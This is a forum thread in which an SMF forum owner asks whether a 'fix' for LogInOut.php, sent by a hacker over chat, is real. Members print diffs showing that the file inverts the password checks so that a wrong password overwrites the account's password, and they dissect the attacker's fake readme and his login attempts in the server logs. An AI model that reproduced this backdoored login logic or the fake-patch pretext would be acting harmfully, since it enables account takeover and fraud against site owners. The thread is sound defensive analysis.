A hacker threatened me with this...

[stormbear]

I run hxxp:booksforsoldiers.com [nonactive] and am a frequent target of politically motivated hackers. I am running SMF 1.0.5.

I carefully downloaded the file he suggested and ultracarefully opened it. It appears to be a replacement for LogInOut.php that he "claims" he fixed.

Now, there is no way I am loading this of course, but can anyone tell me if this is a real threat?

The checked file is here...
hxxp:booksforsoldiers.com/bug_fix_folder.zip [nonactive]

Here is the transcript from one hacker claiming their is a security hole....
(12:48:28 AM) rational_hacker:  let me check out ur site
(12:48:36 AM) rational_hacker:  see if i find and vunerable stuff
(12:48:43 AM) rational_hacker:  brb looking
(12:48:56 AM) Storm:  ::nod::
(1:00:52 AM) rational_hacker: 
(1:00:55 AM) rational_hacker:  i found a huge one
(1:01:09 AM) rational_hacker:  your login system in vunerable
(1:01:13 AM) rational_hacker:  for your forum
(1:01:18 AM) Storm:  how do i fix it?
(1:01:24 AM) rational_hacker:  one sec, im trying to think on what to do
(1:04:20 AM) rational_hacker:  ok
(1:04:21 AM) rational_hacker:  well
(1:04:43 AM) rational_hacker:  i can fix the .php page and give it to you to re upload
(1:05:14 AM) Storm:  how do you want to send it to me?
(1:05:25 AM) rational_hacker:  ***** link deleted *****
(1:05:35 AM) Storm:  ::nod::
(1:05:43 AM) rational_hacker:  when u get it scan it of course
(1:05:45 AM) rational_hacker:  to make sure its safe
(1:05:52 AM) rational_hacker:  then let me know if u dont know how to use it
(1:06:01 AM) rational_hacker:  goes in /sources/
(1:06:05 AM) Storm:  nod
(1:06:33 AM) rational_hacker:  for the forum this is
(1:09:33 AM) Storm:  got it
(1:10:00 AM) Storm:  was the vulnerbility you used last time phpBB related?
(1:10:11 AM) rational_hacker:  no
(1:10:13 AM) rational_hacker:  we used that one
(1:10:23 AM) rational_hacker:  but it was set for php
(1:10:46 AM) Storm:  But the SMF is new... post hack
(1:10:56 AM) rational_hacker:  i know
(1:10:59 AM) rational_hacker:  i jsut scanned it
(1:11:02 AM) rational_hacker:  and was able to get in
(1:11:06 AM) rational_hacker:  using operands
(1:11:19 AM) rational_hacker:  Exploit:

Incorrect operands may lead to account break-ins using certain symbols PHP uses to determine 'TRUE' or 'FALSE' (such as b:1)



Replace LogInOut.php with the provided LogInOut.php to install fix.



- SMF
(1:11:33 AM) rational_hacker:  and the eexploit isnt new
(1:11:38 AM) rational_hacker:  it was just released

[stormbear]

Here are the differences in the two files...

ORIGINAL SMF
LogInOut.php
line 204
   if ($user_settings['passwd'] == crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] == md5($_REQUEST['passwrd']))

Modded SMF
LogInOut.php
line 204
   if ($user_settings['passwd'] != crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] != md5($_REQUEST['passwrd']))


ORIGINAL SMF
LogInOut.php
line 210
   elseif ($user_settings['passwordSalt'] != '' && ($user_settings['passwd'] == md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] == md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))

MODDED SMF
LogInOut.php
line 210
   elseif (($user_settings['passwd'] != md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] != md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))

ORIGINAL SMF
LogInOut.php
line 217
   elseif ($user_settings['passwd'] != $md5_passwrd)


MODDED SMF
LogInOut.php
line 217
   elseif ($user_settings['passwd'] == $md5_passwrd)

[Tristan Perry]

It's changed:

Code Select Expand

// Old style encryption... now's the only time to fix it.
if ($user_settings['passwd'] == crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] == md5($_REQUEST['passwrd']))
{
updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\''));
$user_settings['passwd'] = $md5_passwrd;
}
// What about if the user has come from vBulletin or Invision?  Let's welcome them with open arms \o/.
elseif ($user_settings['passwordSalt'] != '' && ($user_settings['passwd'] == md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] == md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))
{
// Get our new encryption in!
updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\'', 'passwordSalt' => '\'\''));
$user_settings['passwd'] = $md5_passwrd;
}
// Bad password!  Thought you could fool the database?!
elseif ($user_settings['passwd'] != $md5_passwrd)
{

To:

Code Select Expand

// Old style encryption... now's the only time to fix it.
if ($user_settings['passwd'] != crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] != md5($_REQUEST['passwrd']))
{
updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\''));
$user_settings['passwd'] = $md5_passwrd;
}
// What about if the user has come from vBulletin or Invision?  Let's welcome them with open arms \o/.
elseif (($user_settings['passwd'] != md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] != md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))
{
// Get our new encryption in!
updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\'', 'passwordSalt' => '\'\''));
$user_settings['passwd'] = $md5_passwrd;
}
// Bad password!  Thought you could fool the database?!
elseif ($user_settings['passwd'] == $md5_passwrd)
{

It looks like people wouldn't be able to login anymore.. If the person entered a legitimate password, they'd be shown a "Wrong password" message and wouldn't be logged in. Would probably give the impression that your forum has been hacked or something.

Obvious enough, although don't use that script!

[stormbear]

trust me... not using this. But I do need to know if there is actually a vulnerability...

[Tristan Perry]

trust me... not using this. But I do need to know if there is actually a vulnerability...

I think that it'd block legitimate login requests, and login someone who uses a wrong password.. So yes, it'd be a vulnerability.

[Chris Cromer]

There isn't a vulernability in login currently. But if you upload that script he gave you it would cause problems.

That guy is just blowing smoke, and is trying to trick you into messing up your own forum.

[stormbear]

Here is the content of his readme
----------
Exploit:
Incorrect operands may lead to account break-ins using certain symbols PHP uses to determine 'TRUE' or 'FALSE' (such as b:1)

Replace LogInOut.php with the provided LogInOut.php to install fix.

- SMF
----------

[Tristan Perry]

It's not true; SMF 1.0.5 hasn't had any reported security vulnerabilities as far as I know. Ignore it. Looking into things further. This wouldn't create any vulnerabilities, although people would no longer be able to login.

A cookie would be set, although when SMF authorizes the cookie it'd pick-up that something isn't right.

[Chris Cromer]

The content of his readme was made up by him. There is no security reports on this.

[stormbear]

Here are his logs from last night (via tracking on SMF tracking tool)

IP address
Display name
Message
Date

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:05:22 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:05:45 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:05:51 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:05:51 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:06:01 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:06:16 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:06:16 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:06:37 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:06:46 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:06:51 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:07:24 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:07:32 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:07:40 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:07:45 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:08:10 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=register
Today at 05:08:44 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/Register.template.php (eval?)
Line: 454
?action=register2
Today at 05:09:14 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:09:18 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:09:24 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:09:56 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:09:56 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:10:04 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/Profile.template.php (eval?)
Line: 454
?action=profile;u=23487
Today at 05:10:12 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:10:18 AM

212.162.130.82
Guest
Your email address needs to be validated before you can login. - Reina
?action=login2
Today at 05:10:22 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:10:22 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:11:03 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:11:25 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:11:43 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:11:48 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:11:48 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:12:55 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:12:55 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:14:13 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:14:25 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:14:47 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:14:51 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:14:51 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:19:23 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:19:23 AM

[stormbear]

Note the use of a Saudia IP.

[Chris Cromer]

From the look of those logs, it looks like he was trying to exploit that script he told you to upload. But since you didn't upload that file, he failed to get into your account.

If possible ban him.

[Oldiesmann]

The most he would have been able to do is delete everyone's posts (by logging in as each user, one at a time) and change a bunch of non-critical profile settings, but that's about it. It is a security risk, but unless he knew your password, it would have taken more than that to get into the admin center (even if you've got admin security disabled, which is a bad idea unless you're using SMF on your own personal test machine that can't be accessed from outside your local area network...).

First, ban this idiot through SMF - if there aren't any other users with IP addresses that are close to his, ban everything between 212.162.130.0 and 212.162.130.255 (enter the IP address as 212.162.130.0-255 to accomplish this).

Then, ban that same range of IPs through .htaccess, like so:

Code Select Expand

order allow, deny
deny from 212.162.130.0-255
allow all

To create a .htaccess file, open up Notepad and put that code in the document, then save it and upload it to /var/www/html. Windows will save it as .htaccess.txt by default - so either select "All Files" from the "Type:" list in the "Save" dialog box, or just rename it after you upload it.

The .htaccess method will prevent him from being able to access anything on your server. Instead of seeing what he wants, he'll just get hit with a "403 forbidden" message...

[Fizzy]

When you ban him on the IP number watch out in the error log for other IP's attempting the same thing. He may have used a spoofed or proxied IP.

[[Unknown]]

Code Select Expand

        // Old style encryption... now's the only time to fix it.
-       if ($user_settings['passwd'] == crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] == md5($_REQUEST['passwrd']))
+       if ($user_settings['passwd'] != crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] != md5($_REQUEST['passwrd']))

This will make it so that if the person trying to log in gets their password wrong, it will reset it to the password typed.

For example, if your username is "admin" and your password is "admin", and the hacker (with this NEW code) tries to log in with "admin" and "test", your password will be changed to "test".

Clearly, this change is what the would-be hacker script kiddie is hoping you'll make.  He'd probably be ecstatic if we made a new release with that change.

Code Select Expand

        // What about if the user has come from vBulletin or Invision?  Let's welcome them with open arms \o/.
-       elseif ($user_settings['passwordSalt'] != '' && ($user_settings['passwd'] == md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] == md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))
+       elseif (($user_settings['passwd'] != md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] != md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))
        {
                // Get our new encryption in!
                updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\'', 'passwordSalt' => '\'\''));
                $user_settings['passwd'] = $md5_passwrd;
        }

This does exactly the same thing.  Since the first change already "fixed" that you can't change people's passwords on log in, changing it here has no real affect (except perhaps making it look more authentic to people who don't know PHP?)

Code Select Expand

        // Bad password!  Thought you could fool the database?!
-       elseif ($user_settings['passwd'] != $md5_passwrd)
+       elseif ($user_settings['passwd'] == $md5_passwrd)
        {
                // They've messed up again - keep a count to see if they need a hand.
                if (isset($_SESSION['failed_login']))

That's quite funny.  There, it won't say you got a bad password unless your password was correct.  Silly, isn't it?

DO NOT apply that change, whatever you do.  Without the changed file, your installation is secure.  With it, YOU WILL GET HACKED.  I suggest deleting the file, and reporting this person to the proper authorities (abuse for his email account, whatever messenger you were talking to him on, etc.)

-[Unknown]

[Oldiesmann]

Whoops... Wasn't paying attention there... Good thing you didn't listen to him. Seems he could have done a lot more damage than I thought.

[Thunderace]

Please do report him . .we don't need idiots like this to feel they can roam and attack freely.

Here it's virtually impossible as people know their stuff .. but just think of those who have no code skills at all! SMF is perfectly designed for them as it's so easy. This @#!! will be roaming the net to find such a person.

Also the security reputation of SMF will give him kudos. which I imagine is what he's after.

[stormbear]

I love you guys....


Thanks so much for all the help.

You have no idea what we have been through this year.

Storm Williams
Founder
BFS

[Fizzy]

You did the right thing in bringing this problem to the Dev experts